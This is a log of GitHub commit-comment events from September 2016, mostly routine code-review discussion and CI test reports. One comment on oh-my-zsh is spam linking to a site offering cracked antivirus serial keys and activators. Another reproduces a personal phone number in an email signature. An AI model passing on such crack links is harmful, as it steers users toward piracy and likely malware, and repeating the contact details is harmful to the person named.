{"id":"4523303055","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18916825,"position":1,"line":1,"path":".ruby-version","commit_id":"5441fe485ed164d61ed5fd0c47aad1fb1c43550b","created_at":"2016-09-06T19:15:36Z","updated_at":"2016-09-06T19:15:36Z","body":"Не думал об таком. \r\nУ меня rbenv, пользоваться которым меня научили на работе. Насколько я понял, там нет никакого способа задавать версию Ruby иначе как в файле .ruby-version. На GitHub [просят](https://github.com/rbenv/rbenv/issues/727) реализовать такую возможность, но авторы отказываются, мотивируя тем, что это излишне усложнит простой инструмент. "}},"created_at":"2016-09-06T19:15:36Z"}
{"id":"4523316048","type":"CommitCommentEvent","actor":{"login":"ajsnake"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18916880,"position":null,"line":null,"path":null,"commit_id":"00793fd42d693bcbf8d19a75d86901f720348341","created_at":"2016-09-06T19:18:08Z","updated_at":"2016-09-06T19:18:08Z","body":"Heyo! you forgot add \"pokerare\": \"^0.1.1\" dependency in package.json"}},"created_at":"2016-09-06T19:18:08Z"}
{"id":"4523316701","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18916884,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-06T19:18:16Z","updated_at":"2016-09-06T19:18:16Z","body":"gen generates a different variable each time."}},"created_at":"2016-09-06T19:18:16Z"}
{"id":"4523317055","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18916886,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-06T19:18:19Z","updated_at":"2016-09-06T19:18:19Z","body":"*value"}},"created_at":"2016-09-06T19:18:19Z"}
{"id":"4523322583","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916906,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T19:19:19Z","updated_at":"2016-09-06T19:19:19Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2324 of 2334 tests passed, 1 test warnings)\n\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 5 tests had: MTR big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T19:19:19Z"}
{"id":"4523326312","type":"CommitCommentEvent","actor":{"login":"lkraav"},"repo":{"name":"lkraav/candy-plugins"},"payload":{"comment":{"id":18916925,"position":null,"line":null,"path":null,"commit_id":"fa1e15f5baee3157d318b0b6e806c4da909d5ddb","created_at":"2016-09-06T19:20:02Z","updated_at":"2016-09-06T19:20:02Z","body":"For some unknown reason `padding` css rule gets stripped during rendering."}},"created_at":"2016-09-06T19:20:02Z"}
{"id":"4523326436","type":"CommitCommentEvent","actor":{"login":"danishali007"},"repo":{"name":"robbyrussell/oh-my-zsh"},"payload":{"comment":{"id":18916926,"position":null,"line":null,"path":null,"commit_id":"71201ffd67da9bb8a60d998ebce4dfe7e1039c98","created_at":"2016-09-06T19:20:02Z","updated_at":"2016-09-06T19:20:02Z","body":"http://www.cracks9.com\r\nhttp://www.cracks9.com/eset-nod32-anitivirus-9-serial-keys-crack-activator-free-download/\r\nhttp://www.cracks9.com/c/antivirus\r\nhttp://www.urdupoetry4u.com/2016/09/top-20-sad-quotes-by-shakespeare.html\r\nhttp://www.urdupoetry4u.com/2016/08/status-for-whatsapp-in-english.html\r\nhttp://www.urdupoetry4u.com/2016/07/funny-whatsapp-status.html\r\nhttp://www.urdupoetry4u.com/2016/07/top-10-love-poems-love-poems-for-her.html"}},"created_at":"2016-09-06T19:20:02Z"}
{"id":"4523334260","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18916943,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T19:21:33Z","updated_at":"2016-09-06T19:21:33Z","body":"@Nadahar It's how i understood this part of your code.\r\nhttps://github.com/UniversalMediaServer/UniversalMediaServer/blob/master/src/main/java/net/pms/configuration/RendererConfiguration.java#L1305L1308"}},"created_at":"2016-09-06T19:21:33Z"}
{"id":"4523352244","type":"CommitCommentEvent","actor":{"login":"onodera-punpun"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":18917012,"position":124,"line":124,"path":"graphicsmagick/.footprint","commit_id":"d941dc02b0d2e918995678e1ca86844ced1cb781","created_at":"2016-09-06T19:25:07Z","updated_at":"2016-09-06T19:25:07Z","body":"I'm pretty sure this is counted as \"trash\" under the CRUX ports guidelines and can be `rm -rf`d."}},"created_at":"2016-09-06T19:25:07Z"}
{"id":"4523354330","type":"CommitCommentEvent","actor":{"login":"SethTisue"},"repo":{"name":"adriaanm/community-builds"},"payload":{"comment":{"id":18917015,"position":null,"line":null,"path":null,"commit_id":"0e4abd29502c836283848f4f13fc2685ef2a45e5","created_at":"2016-09-06T19:25:30Z","updated_at":"2016-09-06T19:25:30Z","body":"ok, I'll check on it and restore if possible."}},"created_at":"2016-09-06T19:25:30Z"}
{"id":"4523357734","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"csenger/sc.social.like"},"payload":{"comment":{"id":18917025,"position":null,"line":null,"path":null,"commit_id":"ce5f69447a4711148ab1b500e7b0210f2c3fb20e","created_at":"2016-09-06T19:26:09Z","updated_at":"2016-09-06T19:26:09Z","body":"I said line **39**, not 69 :-) my point is `.encode('utf-8')` is not needed."}},"created_at":"2016-09-06T19:26:09Z"}
{"id":"4523361291","type":"CommitCommentEvent","actor":{"login":"adamvy"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":18917036,"position":4,"line":141,"path":"src/foam/u2/view/ChoiceView.js","commit_id":"8541475aa9a832a77d8be3f37887604bc0af4710","created_at":"2016-09-06T19:26:52Z","updated_at":"2016-09-06T19:26:52Z","body":"Would be useful to call this.onDAOUpdate() in initE, if this.dao is set.\r\n\r\nOtherwise if you sub-class the ChoiceView and put a factory on 'dao', it still won't trigger onDAOUpdate since factories are lazy in FOAM2."}},"created_at":"2016-09-06T19:26:52Z"}
{"id":"4523365417","type":"CommitCommentEvent","actor":{"login":"liam-middlebrook"},"repo":{"name":"ComputerScienceHouse/conditional"},"payload":{"comment":{"id":18917045,"position":null,"line":null,"path":null,"commit_id":"21561f33e14018b7081e91f5d84ff65c8797909e","created_at":"2016-09-06T19:27:41Z","updated_at":"2016-09-06T19:27:41Z","body":"Then don't make commits that fail to lint!\n\nOn Tue, Sep 6, 2016 at 3:06 PM, Marc Billow <notifications@github.com>\nwrote:\n\n> Stop disabling linters! If you want to change the settings, we can have a\n> conversation about that. But disabling the checks doesn't help us in any\n> way.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ComputerScienceHouse/conditional/commit/21561f33e14018b7081e91f5d84ff65c8797909e#commitcomment-18916689>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADvULlx0g4xXeTwwQaEk4Awgc3p9srbWks5qnbnIgaJpZM4J2LNX>\n> .\n>\n\n\n\n-- \n\n------------------------------------------------------------\n----------------------------------\nLiam Middlebrook\n\nEmail: liammiddlebrook@gmail.com\nGitHub: liam-middlebrook <https://github.com/liam-middlebrook>\nPhone: 585-698-9579\n"}},"created_at":"2016-09-06T19:27:41Z"}
{"id":"4523371035","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18917059,"position":1,"line":1,"path":"README.rdoc","commit_id":"5441fe485ed164d61ed5fd0c47aad1fb1c43550b","created_at":"2016-09-06T19:28:49Z","updated_at":"2016-09-06T19:28:49Z","body":"Добавил описание."}},"created_at":"2016-09-06T19:28:49Z"}
{"id":"4523375768","type":"CommitCommentEvent","actor":{"login":"sbenito"},"repo":{"name":"sbenito/sibis-platform.github.io"},"payload":{"comment":{"id":18917070,"position":null,"line":null,"path":null,"commit_id":"1b360c51cce08403dfe5cb687ccee14e0a0ef569","created_at":"2016-09-06T19:29:49Z","updated_at":"2016-09-06T19:29:49Z","body":"@nicholsn @ kipohl\r\n\r\nNot sure if you want to merge this, changes can be made in text\r\n"}},"created_at":"2016-09-06T19:29:49Z"}
{"id":"4523378846","type":"CommitCommentEvent","actor":{"login":"max3903"},"repo":{"name":"OCA/server-tools"},"payload":{"comment":{"id":18917078,"position":5,"line":30,"path":"kpi/__openerp__.py","commit_id":"b1a798b4c2f5fc74da2ac06a1bfb55cf3f40e73b","created_at":"2016-09-06T19:30:25Z","updated_at":"2016-09-06T19:30:25Z","body":"@naousse Not required. The `Employee` user group is created by the base module, not the hr module."}},"created_at":"2016-09-06T19:30:25Z"}
{"id":"4523380231","type":"CommitCommentEvent","actor":{"login":"drybjed"},"repo":{"name":"ypid/ansible-pki"},"payload":{"comment":{"id":18917082,"position":17,"line":165,"path":"docs/acme-integration.rst","commit_id":"1a2c6865b8dfcfa415a3d60897318a2847faa256","created_at":"2016-09-06T19:30:40Z","updated_at":"2016-09-06T19:30:40Z","body":"I think that the realm can be named afer one of the included domains (not the apex, but a subdomain), then `nginx` should be able to pick out the correct realm based on that domain. But I'm not sure if the script correctly filters out duplicates in the generated requests - I believe so."}},"created_at":"2016-09-06T19:30:40Z"}
{"id":"4523383902","type":"CommitCommentEvent","actor":{"login":"wilddom"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18917088,"position":null,"line":null,"path":null,"commit_id":"5e48908535bb93326eba5f51d048d444b7469ce4","created_at":"2016-09-06T19:31:22Z","updated_at":"2016-09-06T19:31:22Z","body":"Hm... actually I tested  this code in mysql...\r\nThe same code is in `componentupdate.php`, you may want to change it there too."}},"created_at":"2016-09-06T19:31:22Z"}
{"id":"4523383952","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18917089,"position":null,"line":null,"path":null,"commit_id":"cbde1516f0ed42360dd40f8feb99afee0a7b2f69","created_at":"2016-09-06T19:31:23Z","updated_at":"2016-09-06T19:31:23Z","body":"I think it's ok to not pass the version on script updates and partial object updates, but we wouldn't want to do it for PatchDocument updates because we could lose data outside of our patch.  We get the document, someone updates the document, then we apply the patch to an outdated document and save it without version so we don't get notified that it was updated and we overwrote someone's changes outside of the patch. Does that make sense?"}},"created_at":"2016-09-06T19:31:23Z"}
{"id":"4523384376","type":"CommitCommentEvent","actor":{"login":"royrwood"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18917090,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T19:31:29Z","updated_at":"2016-09-06T19:31:29Z","body":"Thanks, @grandinj -- that was just about perfect for converting the incoming UUID.  \r\n\r\nLines 908-925 in org/h2/value/Value.java look like as follows.  I'd like to get this accepted as a patch, so what's the best way to do that?  What else would you guys like to see as part of a submission?\r\n\r\n@svladykin mentioned something about a smarter getObject( ) implementation that checks SysProperties.serializeJavaObject.  Will you need that done first?\r\n\r\n            case UUID: {\r\n                switch (getType()) {\r\n                case BYTES:\r\n                    return ValueUuid.get(getBytesNoCopy());\r\n                case TIMESTAMP_TZ:\r\n                    throw DbException.get(ErrorCode.DATA_CONVERSION_ERROR_1, getString());\r\n                case JAVA_OBJECT:\r\n                    Object object = JdbcUtils.deserialize(getBytesNoCopy(), getDataHandler());\r\n                    if (object instanceof java.util.UUID) {\r\n                        java.util.UUID uuid = (java.util.UUID) object;\r\n                        return ValueUuid.get(uuid.getMostSignificantBits(), uuid.getLeastSignificantBits());\r\n                    }\r\n                    else {\r\n                        throw DbException.get(ErrorCode.DATA_CONVERSION_ERROR_1, getString());\r\n                    }\r\n                }\r\n                break;\r\n            }\r\n"}},"created_at":"2016-09-06T19:31:29Z"}
{"id":"4523388641","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":18917093,"position":null,"line":null,"path":null,"commit_id":"07a9fd2a1722c8d985d9eb356428478319042332","created_at":"2016-09-06T19:32:16Z","updated_at":"2016-09-06T19:32:16Z","body":"The config.h is actually generated by ./configure. rmw.h will #include it."}},"created_at":"2016-09-06T19:32:16Z"}
{"id":"4523389339","type":"CommitCommentEvent","actor":{"login":"ChilliHam"},"repo":{"name":"kvangent/PokeAlarmWiki"},"payload":{"comment":{"id":18917095,"position":null,"line":null,"path":null,"commit_id":"9e1f2048f3cba6102a5aa27ffe01fd6481ed7e52","created_at":"2016-09-06T19:32:24Z","updated_at":"2016-09-06T19:32:24Z","body":"Oh, I was referring to it being in the \"Gyms\" channel and it was giving time left for a lure. I guess this works too xD"}},"created_at":"2016-09-06T19:32:24Z"}
{"id":"4523390502","type":"CommitCommentEvent","actor":{"login":"hareno44"},"repo":{"name":"dcfemtech/hackforgood-waba-map"},"payload":{"comment":{"id":18917099,"position":null,"line":null,"path":null,"commit_id":"3cc617ba7c29697488ca70d7be7ac90794a24ffd","created_at":"2016-09-06T19:32:39Z","updated_at":"2016-09-06T19:32:39Z","body":"Added: Title, description, credit, WABA logo. \r\nNeed to push these elements to be in front of the map and organize them accordingly. "}},"created_at":"2016-09-06T19:32:39Z"}
{"id":"4523394364","type":"CommitCommentEvent","actor":{"login":"StephenCleary"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18917108,"position":null,"line":null,"path":null,"commit_id":"cbde1516f0ed42360dd40f8feb99afee0a7b2f69","created_at":"2016-09-06T19:33:25Z","updated_at":"2016-09-06T19:33:25Z","body":"Yes, that makes sense."}},"created_at":"2016-09-06T19:33:25Z"}
{"id":"4523395247","type":"CommitCommentEvent","actor":{"login":"kvangent"},"repo":{"name":"kvangent/PokeAlarmWiki"},"payload":{"comment":{"id":18917110,"position":null,"line":null,"path":null,"commit_id":"9e1f2048f3cba6102a5aa27ffe01fd6481ed7e52","created_at":"2016-09-06T19:33:36Z","updated_at":"2016-09-06T19:33:36Z","body":"@reme-dy We both looked at it and didn't notice lol"}},"created_at":"2016-09-06T19:33:36Z"}
{"id":"4523396281","type":"CommitCommentEvent","actor":{"login":"genych"},"repo":{"name":"genych/Scripts"},"payload":{"comment":{"id":18917116,"position":null,"line":null,"path":null,"commit_id":"8000edd5ae3dcfa00d63a9545b95fa2189f5aa3c","created_at":"2016-09-06T19:33:47Z","updated_at":"2016-09-06T19:33:47Z","body":"For https://www.youtube.com/playlist?list=PLVA7yq60oCnho4trTJHm2-H1edXWBx4_b"}},"created_at":"2016-09-06T19:33:47Z"}
{"id":"4523398228","type":"CommitCommentEvent","actor":{"login":"ypid"},"repo":{"name":"ypid/ansible-pki"},"payload":{"comment":{"id":18917119,"position":17,"line":165,"path":"docs/acme-integration.rst","commit_id":"1a2c6865b8dfcfa415a3d60897318a2847faa256","created_at":"2016-09-06T19:34:09Z","updated_at":"2016-09-06T19:34:09Z","body":"I agree. @ser, can you test this?"}},"created_at":"2016-09-06T19:34:09Z"}
{"id":"4523401300","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":18917125,"position":null,"line":null,"path":null,"commit_id":"52bb457ea0b7f0d0d888fb65b6e28f306caf28dc","created_at":"2016-09-06T19:34:42Z","updated_at":"2016-09-06T19:34:42Z","body":"This commit is version 2016.09.04.01a. My apologies for the opaque commit messages."}},"created_at":"2016-09-06T19:34:42Z"}
{"id":"4523402198","type":"CommitCommentEvent","actor":{"login":"tioback"},"repo":{"name":"lizarusi/react-native-scrollable-tab-view"},"payload":{"comment":{"id":18917128,"position":36,"line":143,"path":"index.js","commit_id":"22bcd0004168e2de62de5ac5c5713d4ac2c462e7","created_at":"2016-09-06T19:34:53Z","updated_at":"2016-09-06T19:34:53Z","body":"Thanks, I thought there was a problem, but after investigating, I simply forgot the {flex: 1} in the parent view :-/"}},"created_at":"2016-09-06T19:34:53Z"}
{"id":"4523402206","type":"CommitCommentEvent","actor":{"login":"reme-dy"},"repo":{"name":"kvangent/PokeAlarmWiki"},"payload":{"comment":{"id":18917129,"position":null,"line":null,"path":null,"commit_id":"9e1f2048f3cba6102a5aa27ffe01fd6481ed7e52","created_at":"2016-09-06T19:34:53Z","updated_at":"2016-09-06T19:34:53Z","body":"Haha wow that completely went over the both of us"}},"created_at":"2016-09-06T19:34:53Z"}
{"id":"4523403799","type":"CommitCommentEvent","actor":{"login":"jooskim"},"repo":{"name":"jooskim/vic"},"payload":{"comment":{"id":18917135,"position":13,"line":10,"path":"tests/test-cases/Group10-VIC-UI/vicui-common.robot","commit_id":"61e512513635ef47194199b7c63914f1941ff87a","created_at":"2016-09-06T19:35:13Z","updated_at":"2016-09-06T19:35:13Z","body":"All information here is just for local testing. By the time a PR is created these will be replaced with placeholder values and will be populated at runtime"}},"created_at":"2016-09-06T19:35:13Z"}
{"id":"4523405253","type":"CommitCommentEvent","actor":{"login":"franzibul"},"repo":{"name":"franzibul/Power16x"},"payload":{"comment":{"id":18917137,"position":null,"line":null,"path":null,"commit_id":"e7b6aa3fae4e88fc3a2187995636a98cd66d6985","created_at":"2016-09-06T19:35:27Z","updated_at":"2016-09-06T19:35:27Z","body":"THIS IS VERSION 1 ... 1-2-3 GO!!!"}},"created_at":"2016-09-06T19:35:27Z"}
{"id":"4523406623","type":"CommitCommentEvent","actor":{"login":"fredmcc"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":18917139,"position":null,"line":null,"path":null,"commit_id":"2507b90a2827496fd9aae04624bc2a8aabbb64f3","created_at":"2016-09-06T19:35:41Z","updated_at":"2016-09-06T19:35:41Z","body":"This commit has broken the smartport flight mode functionality.\r\nA bitwise OR is not the same thing as a decimal addition so this creates many unintended values.\r\neg. 10000 + 20 + 1 = 10021  where as  10000 | 20 | 1 = 10005. \r\nI can create a pull request if you like with as well a proposal for the GTUNE / PASSTHROUGH conflict with additions.\r\nOr we could make the jump to a bitmask but I guess this would screw up those who have created radio scripts already so maybe a bad idea at this point.\r\nIn any case i suggest fixing this prior to the next release."}},"created_at":"2016-09-06T19:35:41Z"}
{"id":"4523408328","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18917143,"position":null,"line":null,"path":null,"commit_id":"cbde1516f0ed42360dd40f8feb99afee0a7b2f69","created_at":"2016-09-06T19:36:03Z","updated_at":"2016-09-06T19:36:03Z","body":"I agree but you get the version from the hit. It would be nice for this to error in some occurrences were you might have two long running operations updating the same document."}},"created_at":"2016-09-06T19:36:03Z"}
{"id":"4523409341","type":"CommitCommentEvent","actor":{"login":"ChilliHam"},"repo":{"name":"kvangent/PokeAlarmWiki"},"payload":{"comment":{"id":18917146,"position":null,"line":null,"path":null,"commit_id":"9e1f2048f3cba6102a5aa27ffe01fd6481ed7e52","created_at":"2016-09-06T19:36:16Z","updated_at":"2016-09-06T19:36:16Z","body":"@reme-dy @kvangent I felt like an idiot because I thought it was suppose to be like that when you just corrected the punctuation xD "}},"created_at":"2016-09-06T19:36:16Z"}
{"id":"4523410916","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917151,"position":7,"line":7,"path":"src/main/java/xigua/battle/of/elements/model/ElementList.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:36:33Z","updated_at":"2016-09-06T19:36:33Z","body":"用`SummonedElementBank`貌似更合适一些？"}},"created_at":"2016-09-06T19:36:33Z"}
{"id":"4523412484","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18917152,"position":null,"line":null,"path":null,"commit_id":"cbde1516f0ed42360dd40f8feb99afee0a7b2f69","created_at":"2016-09-06T19:36:52Z","updated_at":"2016-09-06T19:36:52Z","body":"That is fine, we just need to retry and make sure that when we apply a json patch and save the doc that it was the latest version of the doc."}},"created_at":"2016-09-06T19:36:52Z"}
{"id":"4523413567","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917157,"position":3,"line":3,"path":"src/main/java/xigua/battle/of/elements/model/ElementListFullException.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:37:04Z","updated_at":"2016-09-06T19:37:04Z","body":"这里也可以改成`SummonedElementBankFullException`。"}},"created_at":"2016-09-06T19:37:04Z"}
{"id":"4523418792","type":"CommitCommentEvent","actor":{"login":"tzerrell"},"repo":{"name":"MoreEventsMod/More_Events_Mod_Beta"},"payload":{"comment":{"id":18917171,"position":null,"line":null,"path":null,"commit_id":"4a36f9cad574fff69c2ab29ddaaf66bf815e5d02","created_at":"2016-09-06T19:38:06Z","updated_at":"2016-09-06T19:38:06Z","body":"The changes in `mem_duel_ritual.6.desc`, `mem_duel_ritual.6.c.tooltip`, `mem_duel_ritual.6.c.response`, and `mem_duel_ritual.8.desc` are essentially suggestions and can be reverted. The other changes can certainly be revised if we don't like them, but shouldn't just be reverted."}},"created_at":"2016-09-06T19:38:06Z"}
{"id":"4523419493","type":"CommitCommentEvent","actor":{"login":"cemsbr"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18917175,"position":18,"line":16,"path":"pyof/v0x02/common/header.py","commit_id":"1634da3868961c14d57062ee8c207bdbcc70148f","created_at":"2016-09-06T19:38:15Z","updated_at":"2016-09-06T19:38:15Z","body":"Thanks for pointing that out. Another option is to use `super().__ordered__`, but manipulating the tuple list wouldn't be trivial."}},"created_at":"2016-09-06T19:38:15Z"}
{"id":"4523419768","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917176,"position":9,"line":9,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:38:18Z","updated_at":"2016-09-06T19:38:18Z","body":"IntelliJ会把超过一定个数的import整理成带星号的表达方式，最好还是设置一下IntelliJ，不要让它整理成星号。"}},"created_at":"2016-09-06T19:38:18Z"}
{"id":"4523420632","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917178,"position":10,"line":10,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:38:28Z","updated_at":"2016-09-06T19:38:28Z","body":"这里同上。"}},"created_at":"2016-09-06T19:38:28Z"}
{"id":"4523426943","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18917193,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T19:39:43Z","updated_at":"2016-09-06T19:39:43Z","body":"@Sami32 That was what I suspected, that's why I said that if you look at [the diff](https://github.com/UniversalMediaServer/UniversalMediaServer/commit/9eb4c59e08fd2193d63765fa89e421dfe0668cd8) you'll see that that code isn't mine - [it was there before](https://github.com/UniversalMediaServer/UniversalMediaServer/blob/09a265010a2edd71600f84287369528d620e7ee8/src/main/java/net/pms/configuration/RendererConfiguration.java#L1289#L1295) 9eb4c59e08fd2193d63765fa89e421dfe0668cd8. I didn't touch the way it was handled when ```isAudioResample()``` is active, only when it's turned off. The reason for this is that I consider ```isAudioResample()``` some special PS3 configuration that would probably break if touched."}},"created_at":"2016-09-06T19:39:43Z"}
{"id":"4523428657","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18917200,"position":null,"line":null,"path":null,"commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T19:40:01Z","updated_at":"2016-09-06T19:40:01Z","body":"nema potrebe da imas 2 navigation controllera - dovoljno je da sa \"+\" prevuces segue na expenseViewController"}},"created_at":"2016-09-06T19:40:01Z"}
{"id":"4523430116","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917205,"position":21,"line":21,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:40:18Z","updated_at":"2016-09-06T19:40:18Z","body":"这个测试里测试了两个东西，第一个是元素能够正确加入bank中，第二个是元素的个数如果超出的话，就会抛出异常。两个测试的内容最好分开写在两个不同的方法中。"}},"created_at":"2016-09-06T19:40:18Z"}
{"id":"4523430940","type":"CommitCommentEvent","actor":{"login":"vincentstorme"},"repo":{"name":"hnlee/kata"},"payload":{"comment":{"id":18917207,"position":4,"line":23,"path":".gitignore","commit_id":"30e3f7605083629a6ef5c636bd27fe491661a352","created_at":"2016-09-06T19:40:27Z","updated_at":"2016-09-06T19:40:27Z","body":"yay, this was annoying lol"}},"created_at":"2016-09-06T19:40:27Z"}
{"id":"4523430982","type":"CommitCommentEvent","actor":{"login":"jsumners"},"repo":{"name":"jsumners/pino-socket"},"payload":{"comment":{"id":18917208,"position":20,"line":49,"path":"lib/TcpConnection.js","commit_id":"296a9e161ede7de484aea418902a0d29dd3da88a","created_at":"2016-09-06T19:40:27Z","updated_at":"2016-09-06T19:40:27Z","body":"Have you seen my explanation of this in the full issue comments?"}},"created_at":"2016-09-06T19:40:27Z"}
{"id":"4523431989","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18917212,"position":null,"line":null,"path":null,"commit_id":"e57a7e7bafdcd74e7962b59f5ac2e889e05787e5","created_at":"2016-09-06T19:40:39Z","updated_at":"2016-09-06T19:40:39Z","body":"@xfurymcpe I committed it as his credentials."}},"created_at":"2016-09-06T19:40:39Z"}
{"id":"4523432326","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18917216,"position":18,"line":16,"path":"pyof/v0x02/common/header.py","commit_id":"1634da3868961c14d57062ee8c207bdbcc70148f","created_at":"2016-09-06T19:40:43Z","updated_at":"2016-09-06T19:40:43Z","body":"Yeah, not trivial at all!\r\n(And this is highly correlated to #157) "}},"created_at":"2016-09-06T19:40:43Z"}
{"id":"4523433593","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18917219,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T19:40:59Z","updated_at":"2016-09-06T19:40:59Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2358 of 2368 tests passed, 1 test warnings)\n\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 5 tests had: MTR big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.58%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T19:40:59Z"}
{"id":"4523435154","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917225,"position":28,"line":28,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T19:41:18Z","updated_at":"2016-09-06T19:41:18Z","body":"如果需要测试抛出异常的话，可以利用`assertThatThrownBy(() -> {...})`来做，这样就不用手动写try...catch...了。"}},"created_at":"2016-09-06T19:41:18Z"}
